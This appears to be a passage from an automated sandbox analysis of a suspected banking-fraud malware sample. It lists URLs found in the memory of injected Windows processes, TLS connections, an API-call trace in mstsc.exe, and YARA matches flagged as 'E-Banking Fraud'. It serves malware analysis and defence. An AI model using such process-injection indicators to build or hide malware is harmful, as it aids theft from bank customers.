          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kXpez?w=300&h=157&q=90_S2H
          Source: iexplore.exe, 0000001D.00000002.4194265632.0000000009C53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kXpez?w=300&h=157&q=90d&pid=Wdp&w=300&h=1
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kXpez?w=300&h=157&q=90e
          Source: iexplore.exe, 0000001D.00000002.4194265632.0000000009C53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kXpez?w=300&h=157&q=90h?id=ORMS.fc3cf8d80
          Source: iexplore.exe, 0000001D.00000002.4198856815.0000000009F72000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194392389.0000000009C7A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194265632.0000000009C53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1m6ONl?w=300&h=157&q=90
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193314739.0000000009BE5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1m6ONl?w=300&h=157&q=90...
          Source: iexplore.exe, 0000001D.00000002.4194392389.0000000009C7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1m6ONl?w=300&h=157&q=90o
          Source: iexplore.exe, 0000001D.00000002.4194392389.0000000009C7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1m6ONl?w=300&h=157&q=90y
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194265632.0000000009C53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1m6THH?w=300&h=157&q=90
          Source: iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://vid.newsweek.com/king-charles-gives-major-announcement-monarchy-589602%
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://vid.newsweek.com/king-charles-gives-major-announcement-monarchy-589602Aces
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://vid.newsweek.com/king-charles-gives-major-announcement-monarchy-589602q
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wealthofgeeks.com/best-movies-streaming-on-paramount-plus/
          Source: iexplore.exe, 0000001D.00000002.4223626103.000000000ACDD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wealthofgeeks.com/best-movies-streaming-on-paramount-plus/)
          Source: iexplore.exe, 0000001D.00000002.4198148101.0000000009EBE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://wealthofgeeks.com/historical-movies-that-got-the-history-right-2/
          Source: me[1].json.29.drString found in binary or memory: https://wealthofgeeks.com/paramount-plus
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000005.00000000.1760442798.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4165873978.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000005.00000000.1769871733.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000005.00000002.4165873978.00000000079D3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/llM
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/n
          Source: explorer.exe, 00000005.00000002.4196481242.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1769871733.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.backstage.com/?utm_source=stacker&utm_medium=referral&utm_campaign=local
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.backstage.com/casting/2798119/?utm_source=stacker&utm_medium=referral&utm_campaign=local
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.backstage.com/casting/2808497/?utm_source=stacker&utm_medium=referral&utm_campaign=local
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.backstage.com/discover/movies-and-tv-shows-casting-across-the-us-77173/
          Source: iexplore.exe, 0000001D.00000002.4228571594.000000000B0B5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.barcablaugranes.com/2024/5/27/24165295/xavi-sends-warning-to-hansi-flick-as-he-leaves-ba
          Source: iexplore.exe, 0000001D.00000002.4196608957.0000000009DE2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.basketballnetwork.net/latest-news/lil-wayne-says-cp3-would-be-a-good-but-not-great-fit-f
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0D5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.basketballnetwork.net/latest-news/richard-jefferson-on-the-pacers-biggest-mistake-in-gam
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.basketballnetwork.net/old-school/when-shawn-kemp-blasted-sonics-after-they-gave-money-to
          Source: iexplore.exe, 0000001D.00000002.4227213508.000000000AFB5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194265632.0000000009C4A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.basketballnetwork.net/old-school/wilt-chamberlain-expressed-dismay-attention-kareem-abdu
          Source: iexplore.exe, 0000001D.00000002.4229657635.000000000B0E4000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.billboard.com/music/music-news/rm-right-place-wrong-person-best-new-music-poll-results-1
          Source: iexplore.exe, 0000001D.00000002.4228929059.000000000B0C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.cbr.com/popular-tv-shows-that-are-banned-in-other-countries-why/
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.cbssports.com/mlb/news/yankees-rotation-sets-unique-pitching-mark-despite-not-having-ace
          Source: iexplore.exe, 0000001D.00000002.4171805100.00000000062D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.comparecards.
          Source: iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4190700229.0000000009A35000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, BBI4MeJ[1].json.29.drString found in binary or memory: https://www.comparecards.com/?SplitterId=coca-guide-heres-a-brilliant-way-to-pay-credit-cards&mtaid=
          Source: mstsc.exe, 00000006.00000003.2002328904.0000000006B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: iexplore.exe, 0000001D.00000002.4227213508.000000000AFAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digitaltrends.com/movies/netflix-hacks-tips-tricks/
          Source: iexplore.exe, 0000001D.00000002.4194265632.0000000009C4A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4191854169.0000000009A72000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.fieldgulls.com/2024/5/26/24165203/a-way-too-early-53-man-roster-projection-for-seattle-s
          Source: content_new.js.19.drString found in binary or memory: https://www.google.com/chrome
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1904365892.0000021CCFF51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.ru/
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeString found in binary or memory: https://www.google.ru/CNorthAmerica.Properties.Resources
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.healthline.com/health/why-do-we-hiccup#1
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4227213508.000000000AFA0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4228929059.000000000B0C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4222372836.000000000AC49000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmp, me[1].json.29.drString found in binary or memory: https://www.huffpost.com/entry/kelly-rowland-cannes_n_6650befee4b07f5ea7480679
          Source: iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.huffpost.com/entry/kelly-rowland-cannes_n_6650befee4b07f5ea74806794
          Source: iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.huffpost.com/entry/kelly-rowland-cannes_n_6650befee4b07f5ea7480679H
          Source: iexplore.exe, 0000001D.00000002.4194392389.0000000009C5E000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189410566.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.huffpost.com/entry/kelly-rowland-cannes_n_6650befee4b07f5ea7480679L
          Source: BBI4MeJ[1].json.29.drString found in binary or memory: https://www.lendingtree.com/?splitterid=home-equity&cproduct=homeequity&cchannel=content&csource=tra
          Source: iexplore.exe, 0000001D.00000002.4190700229.0000000009A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.marca.com/en/lifestyle/music/2024/05/26/66534f97e2704ebb9a8b45b5.html
          Source: iexplore.exe, 0000001D.00000003.2485695269.0000000009AED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mayoclinic.org/diseases-conditions/hiccups/symptoms-causes/syc-20352613
          Source: iexplore.exe, 0000000E.00000002.4202564168.000000000A832000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171894799.000000000A82A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000003.2171975111.000000000A831000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.
          Source: iexplore.exe, 0000001D.00000003.2485818011.0000000009A5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006D8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com&
          Source: iexplore.exe, 0000001D.00000002.4221164913.000000000ABA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com)
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006D8A000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4164094053.0000000004A40000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4168229079.0000000005369000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/2
          Source: iexplore.exe, 0000000E.00000002.4175868407.000000000642C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/5
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?
          Source: iexplore.exe, 0000001D.00000002.4193314739.0000000009BEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp#
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E7B000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4178783359.0000000006E0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp#lang=en-us&adsReferer=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp&devi
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp&
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp&9aKEg
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp&n
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp(
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp-9XKGf
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp.
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp...
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp...1
          Source: explorer.exe, 00000005.00000003.3105602905.000000000CAC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4201131372.000000000CAC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp.dll1
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp.icoa
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D338000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp/fwlink/p/?LinkId=255141er
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D419000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D3FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp/p/?LinkId=255141
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp17YN
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp1N
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3.6.3.min.js693935/IE11NTP/desktop-shape.png
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3.6.3.min.js693935/IE11NTP/desktop-shape.pngc
          Source: iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3.6.3.min.jsmillis:
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3.6.3.min.jss
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp49WK;e
          Source: iexplore.exe, 0000000D.00000002.4163339171.000001BA5C5C0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4162752267.0000000004ED0000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4162393628.0000000004740000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp6BFAD05AD3EC71.RefC=2024-05-27T06:42:39Z
          Source: iexplore.exe, 0000001D.00000002.4160602763.0000000000836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp773-1002
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp8
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D419000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp:
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp;
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp;9NKId
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp?(rI0
          Source: explorer.exe, 00000005.00000002.4196481242.000000000C54A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpA
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpB?
          Source: iexplore.exe, 0000000E.00000002.4160624814.0000000003116000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4160602763.0000000000836000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpC:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpF
          Source: explorer.exe, 00000005.00000002.4201832367.000000000CB4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109920204.000000000CB4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109424058.000000000CB14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpGfP4=
          Source: iexplore.exe, 0000000D.00000002.4186849517.000001BA6075A000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpH
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpI)
          Source: iexplore.exe, 0000000E.00000002.4171695825.0000000006340000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpI:
          Source: iexplore.exe, 0000000E.00000002.4160624814.0000000003116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpId=255141
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006327000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpJ9
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpJnqI/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4189814301.00000000099A6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpK
          Source: iexplore.exe, 0000001D.00000002.4177235933.0000000006DCF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpK7
          Source: iexplore.exe, 0000000E.00000002.4225595480.000000000B85E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpL
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpMSNB6
          Source: explorer.exe, 00000005.00000003.3105602905.000000000CB14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202002130.000000000CB6E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109600922.000000000CB6D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106381021.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpMSNC4
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpMSNt
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D34E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpMicrosoft
          Source: iexplore.exe, 0000001D.00000002.4162393628.0000000004740000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpMon
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpN
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D446000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpO
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpOinJL
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpP
          Source: iexplore.exe, 0000001D.00000002.4171805100.0000000006284000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpP)
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpQ
          Source: iexplore.exe, 0000000E.00000002.4171695825.00000000063E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpSM
          Source: iexplore.exe, 0000000E.00000002.4212066151.000000000AE76000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpS__FastBreakpointManager__
          Source: iexplore.exe, 0000000D.00000002.4167076882.000001BA5D2B0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4185927257.000001BA606E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpTerms
          Source: iexplore.exe, 0000000E.00000002.4171695825.000000000635E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpU
          Source: iexplore.exe, 0000001D.00000002.4181802065.0000000006F11000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpViuJK
          Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49788 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.4:49789 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49783 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49798 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 18.244.18.38:443 -> 192.168.2.4:49797 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.108:443 -> 192.168.2.4:49816 version: TLS 1.2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003596C1 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject,6_2_003596C1

          E-Banking Fraud

          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
